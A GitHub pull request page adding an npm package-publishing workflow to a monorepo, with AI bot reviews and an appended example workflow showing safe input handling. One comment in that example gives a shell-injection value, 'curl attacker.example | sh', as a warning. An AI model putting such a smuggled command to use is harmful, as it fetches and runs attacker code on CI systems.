
chore(monorepo): 🤖 Independent Package Publisher (NPM) #953

Open
punkbit wants to merge 17 commits into chore/monorepo-changeset-root-setup from chore/monorepo-package-releaser

Conversation


@punkbit punkbit commented Mar 26, 2026

Why?

The existing release workflow's hardcoded for @clickhouse/click-ui. Supporting packages like design-tokens that live under ./packages/* need a way to publish independently without coupling to the click-ui release cycle (e.g. test/release-candidate -> stable -> latest) and related side-effects (e.g. branch name chore/v<Major.minor.patch>).

💡 In the next iteration, this workflow can have a similar automation to click-ui

⚠️ WARNING: This will require the npm admin to publish an initial placeholder version to NPM due to OIDC workflow whitelisting. See npm/cli#8544. setup-npm-trusted-publish, a dedicated tool for this, can be used to publish a "dummy" package to npm:

npx --yes setup-npm-trusted-publish <package-name>

How?

  • Added a manually triggered workflow that dynamically loads package config from packages//package.json, builds, validates, and publishes to npm (due to command conventions for changelogs, build)
  • Supports dry_run mode for safe validation (npm publish --dry-run), skipping GitHub release and Slack notification
  • Added documentation section explaining manual changeset responsibility (enter/leave pre-release, changeset version) vs the automated click-ui flow
  • Updated README.md release section to link both workflows

Preview?

N/A


changeset-bot bot commented Mar 26, 2026

⚠️ No Changeset found

Latest commit: 57ce616

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types

Click here to learn what changesets are, and how to add one.

Click here if you're a maintainer who wants to add a changeset to this PR

@ClickHouse ClickHouse deleted a comment from github-actions bot Mar 27, 2026
@ClickHouse ClickHouse deleted a comment from github-actions bot Mar 27, 2026

punkbit commented Mar 27, 2026

  • Awk changelog extraction is fragile (line 210): The pattern ## [0-9] to find the next section boundary won't match changelog headings in ## [1.0.0] bracket format (standard Keep a Changelog style). Changesets uses the un-bracketed format by default, so this works for now, but a more robust terminator like ## [0-9\[] would be more defensive.

This has been covered in #947. Please ignore!

  • Awk pattern uses unescaped dots in $VERSION (line 210): awk "/## $VERSION/,/## [0-9]/" — dots in 1.0.0 match any character in the regex. For a version like 1.0.0, this is benign in practice, but 1X0X0 would also match. Escape dots: VERSION_ESCAPED="${VERSION//./\\.}" and use that in the awk pattern.

This has been covered in #947. Please ignore!

@ClickHouse ClickHouse deleted a comment from github-actions bot Mar 27, 2026
@ClickHouse ClickHouse deleted a comment from github-actions bot Mar 27, 2026

github-actions bot commented Mar 27, 2026

🚨 Must Fix

  • Unescaped dots in awk VERSION pattern (.github/workflows/monorepo-package-release.yml line 206): awk "/## $VERSION/,/## [0-9]/" — dots in 1.0.0 match any character in awk regex. A version like 1.0.0 would also match 1X0X0. Fix: VERSION_ESCAPED="${VERSION//./\\.}" and use $VERSION_ESCAPED in the awk pattern.

Anything related with parsing the changelog + AWK should be ignored because this has been covered in #947. Please ignore!

@ClickHouse ClickHouse deleted a comment from github-actions bot Mar 27, 2026
@punkbit punkbit marked this pull request as ready for review March 27, 2026 16:49
@EvandroLG EvandroLG requested a review from Copilot March 30, 2026 09:23
Copilot AI left a comment


Pull request overview

Adds a manually triggered GitHub Actions workflow to publish non-Click UI packages from the monorepo to npm using OIDC trusted publishing, and updates release/security documentation to reflect the new flow.

Changes:

  • Added monorepo-package-release.yml workflow to build, validate, and publish a selected ./packages/* workspace with optional dry-run mode.
  • Documented monorepo package release responsibilities (manual changeset/versioning) and npm trusted publisher setup requirements.
  • Updated README release section to point to both Click UI and monorepo package release docs.

Reviewed changes

Copilot reviewed 4 out of 4 changed files in this pull request and generated 3 comments.

  • packages/click-ui/docs/package-release.md: Adds documentation for the new monorepo package release workflow and npm trusted publishing setup.
  • README.md: Links release docs for Click UI vs supporting monorepo packages.
  • .llm/SECURITY.md: Adds guidance about avoiding workflow_dispatch input interpolation in run: blocks to prevent shell injection.
  • .github/workflows/monorepo-package-release.yml: Introduces a manual, package-selectable npm publisher workflow using OIDC/provenance with optional dry-run, GitHub release, and Slack notification.


@punkbit punkbit force-pushed the chore/monorepo-changeset-root-setup branch from 04de869 to 8899067 Compare March 31, 2026 12:11
@punkbit punkbit force-pushed the chore/monorepo-package-releaser branch from aaa552a to c32e923 Compare March 31, 2026 12:50

github-actions bot commented Mar 31, 2026

Claude finished @punkbit's task in 1m 51s


PR Review

Nice clean-up across these commits — the two blockers from the previous review are resolved. Here's the updated state:


✅ Previously flagged blockers — now resolved

  • Merge conflict in FileTabs.test.tsx → fixed in 72f8c731
  • softprops/action-gh-release@v1 → updated to @v2 in line 220 ✅
  • env: blocks added to the version-check and changelog-extraction steps (lines 165–166, 199–201) ✅
  • npm upgrade step correctly removed — setup-node@v6 with Node 23 ships npm 10.x ✅

💡 Suggestions (non-blocking)

  • registry-url may be redundant (.github/workflows/monorepo-package-release.yml line 123): setup-node with registry-url writes a .npmrc expecting NODE_AUTH_TOKEN, but it's never set in the workflow. OIDC publishing via --provenance handles authentication independently of NODE_AUTH_TOKEN, so this likely works — but the stale .npmrc entry is noise. Consider removing registry-url to match create-release.yml, or explicitly document that OIDC auth bypasses it.

  • Changelog awk extraction (line 206): Already tracked in chore(ci): 🤖 improve changelog parsing #947 — no action needed here.

  • design-tokens package doesn't exist yet (line 20): Already noted — the workflow will fail at the "Load package configuration" step until the package lands. The PR description covers this, but a [!NOTE] comment in the workflow itself would help future trigger attempts.


✅ No issues with:

  • All string inputs correctly passed via env: into run: blocks — consistent with .llm/SECURITY.md
  • dry_run (boolean) and release_type (choice) safely interpolated per SECURITY.md
  • Tag creation handled by softprops/action-gh-release via GitHub API — no explicit git tag needed
  • confirm_package + confirm_branch double-confirmation pattern is a good safeguard
  • id-token: write + --provenance OIDC setup is correct

@ClickHouse ClickHouse deleted a comment from github-actions bot Mar 31, 2026

github-actions bot commented Mar 31, 2026

Claude finished @punkbit's task in 1m 23s


PR Review

  • Read changed files
  • Review workflow and security docs
  • Post final review

This is a well-structured workflow addition. All previously flagged blockers are resolved. Here's the current state:

✅ Previously resolved

  • softprops/action-gh-release@v2
  • env: blocks on version-check and changelog steps ✅
  • npm upgrade step removed (setup-node@v6 + Node 23 ships npm 10.x) ✅
  • Git tag creation handled by softprops/action-gh-release via GitHub API ✅
  • All free-text string inputs passed via env: per SECURITY.md ✅

💡 Suggestions (non-blocking — all previously noted)

  • registry-url may be redundant (monorepo-package-release.yml line 123): setup-node with registry-url writes a .npmrc expecting NODE_AUTH_TOKEN, but that env var is never set. OIDC publishing via --provenance authenticates independently, so this likely works — but the stale .npmrc entry is noise. Consider removing registry-url to match create-release.yml.

  • Changelog awk (line 206): Already tracked in chore(ci): 🤖 improve changelog parsing #947 — no action needed here.

  • design-tokens package doesn't exist yet (line 20): Workflow will fail at "Load package configuration" until the package lands. The PR description notes this; a [!NOTE] inline comment in the workflow would help future trigger attempts.


✅ No issues with:

  • ${{ inputs.dry_run }} (boolean) and ${{ inputs.release_type }} (choice) used directly in run: blocks — both safe to interpolate per SECURITY.md ✅
  • id-token: write + --provenance OIDC setup is correct ✅
  • confirm_package + confirm_branch double-confirmation guard is a solid safeguard ✅
  • Slack notification correctly gated on both !dry_run and secret existence ✅
  • Documentation in package-release.md is clear and actionable ✅

@punkbit punkbit force-pushed the chore/monorepo-changeset-root-setup branch from 507b3f3 to a69cc75 Compare April 2, 2026 15:57
punkbit added 13 commits April 2, 2026 17:03
…e-publisher.yml → monorepo-package-release.yml
…aining why direct interpolation of string inputs into run: blocks is dangerous, a before/after code example, and a note that choice and boolean inputs are safe to interpolate
…ackage_name and version to env: extract changelog (lines 203-206): moved version, package_path, and changelog_file to env:
… with node-version: '23.x' already ships npm 10.x, which has full --provenance support — no upgrade needed
@punkbit punkbit force-pushed the chore/monorepo-package-releaser branch from 61cd422 to 57ce616 Compare April 2, 2026 16:11

github-actions bot commented Apr 2, 2026

Claude finished @punkbit's task in 1m 6s


PR Review

  • Read changed files
  • Review workflow and security docs
  • Post final review

This is a clean, well-structured workflow addition. All blockers from previous review rounds are resolved. Here's the current state:

✅ Previously resolved

  • softprops/action-gh-release@v2
  • env: blocks on all free-text string inputs ✅
  • npm upgrade step correctly removed (setup-node@v6 + Node 23 ships npm 10.x) ✅
  • env: blocks added to version-check and changelog steps ✅
  • Git tag creation handled by softprops/action-gh-release via GitHub API ✅

💡 Suggestions (non-blocking — previously noted, included for completeness)

  • registry-url may be redundant (monorepo-package-release.yml line 123): setup-node with registry-url writes a .npmrc expecting NODE_AUTH_TOKEN, but that env var is never set. OIDC publishing via --provenance authenticates independently. Consider removing to match create-release.yml, or add a comment explaining the intent.

  • Changelog awk extraction (line 206): Already tracked in chore(ci): 🤖 improve changelog parsing #947 — no action needed here.

  • design-tokens package doesn't exist yet (line 20): Workflow will fail gracefully at "Load package configuration" once triggered. A [!NOTE] inline comment in the workflow would help future trigger attempts.


✅ No issues with:

  • ${{ inputs.dry_run }} (boolean) and ${{ inputs.release_type }} (choice) interpolated directly in run: blocks — safe per SECURITY.md ✅
  • id-token: write + --provenance OIDC setup is correct ✅
  • confirm_package + confirm_branch double-confirmation guard is solid ✅
  • Slack notification correctly gated on both !dry_run and secrets.SLACK_BOT_TOKEN != ''
  • All free-text string inputs (confirm_package, confirm_branch) passed via env:
  • Step output values (package_name, version) used safely via env: in shell steps ✅
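
As an added example, not the PR's monorepo-package-release.yml and not the project's code, a minimal workflow_dispatch publisher that shows the patterns the reviews above check for: free-text inputs routed through env: instead of being interpolated into run:, the boolean dry_run interpolated directly, id-token: write with npm publish --provenance, no registry-url on setup-node, and the release and Slack steps gated on !dry_run. The input name package, the action and Node versions, the tag format, and the Slack step are assumptions.

```yaml
# Added example, not the PR's own monorepo-package-release.yml.
# Input "package", action and Node versions, and the Slack step are assumptions.
name: Publish monorepo package (example)

on:
  workflow_dispatch:
    inputs:
      package:
        description: Directory name under ./packages to publish
        required: true
        type: string
      confirm_package:
        description: Re-type the package directory name
        required: true
        type: string
      confirm_branch:
        description: Re-type the branch name you are releasing from
        required: true
        type: string
      dry_run:
        description: Only run npm publish --dry-run
        type: boolean
        default: true

permissions:
  contents: write   # create the GitHub release
  id-token: write   # OIDC token that npm trusted publishing / --provenance needs

jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      # UNSAFE form that .llm/SECURITY.md warns about: the expression is
      # substituted into the script before the shell parses it, so an input
      # like  x"; curl attacker.example | sh; echo "  becomes shell code:
      #   run: echo "Publishing ${{ inputs.package }}"
      # SAFE form: route free-text inputs through env: and quote the variable.
      - name: Load and confirm package configuration
        id: cfg
        env:
          PACKAGE: ${{ inputs.package }}
          CONFIRM_PACKAGE: ${{ inputs.confirm_package }}
          CONFIRM_BRANCH: ${{ inputs.confirm_branch }}
        run: |
          [ "$PACKAGE" = "$CONFIRM_PACKAGE" ] || { echo "package confirmation mismatch"; exit 1; }
          [ "$GITHUB_REF_NAME" = "$CONFIRM_BRANCH" ] || { echo "branch confirmation mismatch"; exit 1; }
          case "$PACKAGE" in ""|*[!A-Za-z0-9_-]*) echo "invalid package directory name"; exit 1;; esac
          [ -f "packages/$PACKAGE/package.json" ] || { echo "packages/$PACKAGE/package.json not found"; exit 1; }
          version=$(cd "packages/$PACKAGE" && node -p "require('./package.json').version")
          echo "package_path=packages/$PACKAGE" >> "$GITHUB_OUTPUT"
          echo "version=$version" >> "$GITHUB_OUTPUT"

      # No registry-url: trusted publishing needs no NODE_AUTH_TOKEN, so the
      # .npmrc that registry-url writes would only be a stale entry.
      - uses: actions/setup-node@v4
        with:
          node-version: 22

      - name: Build
        env:
          PACKAGE_PATH: ${{ steps.cfg.outputs.package_path }}
        run: |
          npm ci
          npm run build --workspace "$PACKAGE_PATH"

      # dry_run is a boolean input: it renders only as true/false, so it is
      # safe to use directly in run: and if: expressions.
      - name: Publish to npm (OIDC trusted publishing with provenance)
        env:
          PACKAGE_PATH: ${{ steps.cfg.outputs.package_path }}
        run: |
          cd "$PACKAGE_PATH"
          if [ "${{ inputs.dry_run }}" = "true" ]; then
            npm publish --provenance --access public --dry-run
          else
            npm publish --provenance --access public
          fi

      - name: GitHub release
        if: ${{ !inputs.dry_run }}
        uses: softprops/action-gh-release@v2
        with:
          tag_name: ${{ inputs.package }}@${{ steps.cfg.outputs.version }}
          generate_release_notes: true

      - name: Slack notification
        if: ${{ !inputs.dry_run && secrets.SLACK_BOT_TOKEN != '' }}
        uses: slackapi/slack-github-action@v2
        with:
          method: chat.postMessage
          token: ${{ secrets.SLACK_BOT_TOKEN }}
          payload: |
            channel: "#releases"
            text: "Published ${{ inputs.package }}@${{ steps.cfg.outputs.version }} to npm"
```

The confirmation step does the validation once and publishes package_path and version as step outputs, so every later step consumes a value that has already been checked rather than re-reading the raw input. The directory-name check is what makes it acceptable to build a path from the input at all.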

@workflow-authentication-public

📚 Storybook Preview Deployed

✅ Preview URL: https://click-7o5so5rqb-clickhouse.vercel.app

Built from commit: c97c2b3f5bbad7ae1ef8ea877d552bd4e25f1f79

3 participants